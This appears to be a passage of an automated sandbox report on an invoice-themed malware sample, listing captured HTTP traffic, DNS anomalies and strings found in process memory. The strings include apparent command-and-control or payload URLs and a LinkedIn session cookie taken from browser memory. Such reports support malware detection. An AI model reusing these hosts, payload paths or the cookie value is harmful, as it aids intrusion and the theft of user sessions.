20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Wed, 26 Oct 2022 11:21:15 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Wed, 26 Oct 2022 11:21:20 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Wed, 26 Oct 2022 11:21:22 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Wed, 26 Oct 2022 11:21:25 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Wed, 26 Oct 2022 11:21:27 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: WWAHost.exe, 00000005.00000002.22578166214.00000000044BC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.18740391421.000000000E42C000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
Source: WWAHost.exe, 00000005.00000003.18664777266.00000000086FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: WWAHost.exe, 00000005.00000002.22582900822.0000000008719000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18664777266.00000000086FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2 equals www.twitter.com (Twitter)
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)

Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: explorer.exe, 0000000A.00000000.18510865097.00000000103BA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 0000000A.00000000.18508495094.00000000100F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18262200880.00000000100F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18384352679.00000000100F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18445655355.00000000100F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18257712618.000000000CF3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18268802672.0000000010647000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18388454484.0000000010647000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18505243187.000000000CF3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18449664886.0000000010647000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18513076242.0000000010647000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18442389953.000000000CF3B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: DHL-INVOICE-MBV.exe, 00000003.00000001.17791517767.0000000000649000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	String found in binary or memory: http://mymobile.aol.com/dbreg/register?action=imf&clientID=1
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	String found in binary or memory: http://mymobile.aol.com/dbreg/register?action=imf&clientID=1http://www.icq.com/whitepages/user_detai
Source: DHL-INVOICE-MBV.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 0000000A.00000000.18384255869.00000000100E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18262067454.00000000100E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18445520286.00000000100E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18508396575.00000000100E9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5
Source: explorer.exe, 0000000A.00000000.18508495094.00000000100F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18262200880.00000000100F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18384352679.00000000100F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18445655355.00000000100F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18257712618.000000000CF3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18268802672.0000000010647000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18388454484.0000000010647000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18505243187.000000000CF3B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18449664886.0000000010647000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18513076242.0000000010647000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18442389953.000000000CF3B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 0000000A.00000000.18384512386.0000000010108000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18445785879.0000000010108000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18262386087.0000000010108000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18508635819.0000000010108000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 0000000A.00000000.18508495094.00000000100F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18265459439.00000000103BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18262200880.00000000100F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18386336305.00000000103BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18447602265.00000000103BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18510933735.00000000103BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18384352679.00000000100F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18445655355.00000000100F6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	String found in binary or memory: http://pidgin.im/
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	String found in binary or memory: http://pidgin.im/aim_data.php3--that
Source: liboscar.dll.1.dr	String found in binary or memory: http://pidgin.im/aim_data.php3?offset=%ld&len=%ld&modname=%s
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	String found in binary or memory: http://pidgin.im/websiteYou
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	String found in binary or memory: http://profiles.aim.com
Source: WWAHost.exe, 00000005.00000002.22579741645.00000000051D4000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://rahaingoadvice.com/d0ad/?jXu=m7uzBk1mijYTNPshBFAqU72ljYeWgHJ5zfNDKvzfwbEYFcgOzP3ENcHYjhFO4jv2
Source: explorer.exe, 0000000A.00000000.18410517135.0000000000B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.18368632762.000000000A230000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.18240824754.000000000A9B0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: DHL-INVOICE-MBV.exe, 00000003.00000002.18128327162.0000000001841000.00000004.00000020.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18127988183.0000000001814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cccre8ive.com/
Source: DHL-INVOICE-MBV.exe, 00000003.00000002.18128327162.0000000001841000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cccre8ive.com/h
Source: DHL-INVOICE-MBV.exe, 00000003.00000002.18128161486.0000000001829000.00000004.00000020.00020000.00000000.sdmp, DHL-INVOICE-MBV.exe, 00000003.00000002.18127588210.00000000017E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cccre8ive.com/vSvUluerSYkJZ205.pfm
Source: DHL-INVOICE-MBV.exe, 00000003.00000002.18128161486.0000000001829000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cccre8ive.com/vSvUluerSYkJZ205.pfmdn
Source: WWAHost.exe, 00000005.00000002.22580786529.0000000005B40000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.clickthelink.xyz/
Source: WWAHost.exe, 00000005.00000002.22578871826.00000000049FA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?-ZeDxH=1bfDxheXLTWtxB0&jXu=49olzBrEkQ26Tp/WHMI
Source: WWAHost.exe, 00000005.00000002.22578871826.00000000049FA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?-ZeDxH=1bfDxheXLTWtxB0&jXu=49olzBrEkQ26Tp/WHMIPDJT
Source: WWAHost.exe, 00000005.00000002.22580951493.0000000005CD2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?hZ=5jUpdPs&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc
Source: WWAHost.exe, 00000005.00000002.22580951493.0000000005CD2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.creotopi.biz/cgi-sys/suspendedpage.cgi?hZ=5jUpdPs&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc8H
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000005.00000003.18673165221.00000000087F2000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: DHL-INVOICE-MBV.exe, 00000001.00000003.17540777299.000000000291E000.00000004.00000800.00020000.00000000.sdmp, AutoConnectHelper.exe.1.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: explorer.exe, 0000000A.00000000.18482597055.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18359068554.0000000004E93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18228798854.0000000004E93000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: DHL-INVOICE-MBV.exe, 00000003.00000001.17791517767.0000000000649000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: WWAHost.exe, 00000005.00000002.22580041012.00000000054F8000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.guvnorsnyc.com/
Source: DHL-INVOICE-MBV.exe, 00000003.00000001.17791344013.0000000000626000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	String found in binary or memory: http://www.icq.com/people
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	String found in binary or memory: http://www.icq.com/peoplehttp://profiles.aim.comIdleOnline
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	String found in binary or memory: http://www.icq.com/whitepages/user_details.php
Source: explorer.exe, 0000000A.00000000.18352820555.0000000002DEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18221172015.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.o
Source: DHL-INVOICE-MBV.exe, 00000003.00000001.17791100936.00000000005F2000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: DHL-INVOICE-MBV.exe, 00000003.00000001.17791100936.00000000005F2000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: WWAHost.exe, 00000005.00000002.22583502651.0000000008736000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 0000000A.00000000.18245249975.000000000C7E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18372722434.000000000C7E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18433650004.000000000C7E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18496415722.000000000C7E6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppD
Source: explorer.exe, 0000000A.00000000.18485911004.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18232387000.000000000914F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmwB
Source: explorer.exe, 0000000A.00000000.18448469262.0000000010557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	String found in binary or memory: https://api.icq.net/aim/startOSCARSession
Source: DHL-INVOICE-MBV.exe, 00000001.00000002.17984888207.000000000291B000.00000004.00000800.00020000.00000000.sdmp, liboscar.dll.1.dr	String found in binary or memory: https://api.login.icq.net/auth/clientLogin
Source: explorer.exe, 0000000A.00000000.18501854717.000000000CCBA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18378370646.000000000CCBA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.18253020138.000000000CCBA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
